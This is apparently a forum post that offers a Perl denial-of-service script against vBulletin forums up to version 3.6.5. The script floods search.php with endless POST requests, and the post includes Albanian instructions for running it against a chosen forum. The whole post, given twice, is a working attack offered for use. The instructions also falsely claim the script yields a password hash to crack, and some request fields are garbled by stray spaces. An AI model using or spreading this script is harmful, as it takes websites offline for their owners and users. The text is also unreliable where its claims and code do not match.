vBulletiin All Version
Page 1 of 1
vBulletiin All Version
VBulletin DoS Exploit
#
#Exploit eshte testuar ne 15 faqe dhe ne 13 ka funksionuar. 98% Works
#
# important => Make sure that Image Verification in (search.php) is NOT Enabled.
# It works on 3.6.5 and prior [all] !
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<99999999999999999999999999999999999999999999999 99999999999999999999999; $i++)
{
$user="h4x0r".$rand.$i;
$data = "s=&do=process&query=$user&titleonly=0&starter only =0&exactname=1&replyless=0&replylimit=3&searchdat e =1&beforeafter=before&sortby=title&order=descendi n g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "|";
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
exit();
};
kete script e merrni e bani copy paste ne notepad edhe e runi si emri.pl tai shkon start run e shkruni cmd tani ku e keni rujt pershembell nese e keni rujt te fajllat ne perl bin shkoni kshtu cd C:\perl\bin tani ju hapet perl bin edhe e shkruni emrin e perlit qe ja keni lan psh emri.pl www.test.com aty te test e shkruni webin a po forumin qe doni me hakirat dhe tani jav qet ni hash code per me zberthy hash code shkoni tek www.gdataonline.com dhe tani vazhdoni me hapat tjer
#
#Exploit eshte testuar ne 15 faqe dhe ne 13 ka funksionuar. 98% Works
#
# important => Make sure that Image Verification in (search.php) is NOT Enabled.
# It works on 3.6.5 and prior [all] !
#
#Perl Script
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/(http:\/\/)//eg;
for ($i=0; $i<99999999999999999999999999999999999999999999999 99999999999999999999999; $i++)
{
$user="h4x0r".$rand.$i;
$data = "s=&do=process&query=$user&titleonly=0&starter only =0&exactname=1&replyless=0&replylimit=3&searchdat e =1&beforeafter=before&sortby=title&order=descendi n g&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search%20Now";
$len = length $data;
$foo = "POST ".$dir."search.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "|";
}
print "\n\n";
system('ping $host');
sub usage {
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /forum/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n\n";
exit();
};
kete script e merrni e bani copy paste ne notepad edhe e runi si emri.pl tai shkon start run e shkruni cmd tani ku e keni rujt pershembell nese e keni rujt te fajllat ne perl bin shkoni kshtu cd C:\perl\bin tani ju hapet perl bin edhe e shkruni emrin e perlit qe ja keni lan psh emri.pl www.test.com aty te test e shkruni webin a po forumin qe doni me hakirat dhe tani jav qet ni hash code per me zberthy hash code shkoni tek www.gdataonline.com dhe tani vazhdoni me hapat tjer
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|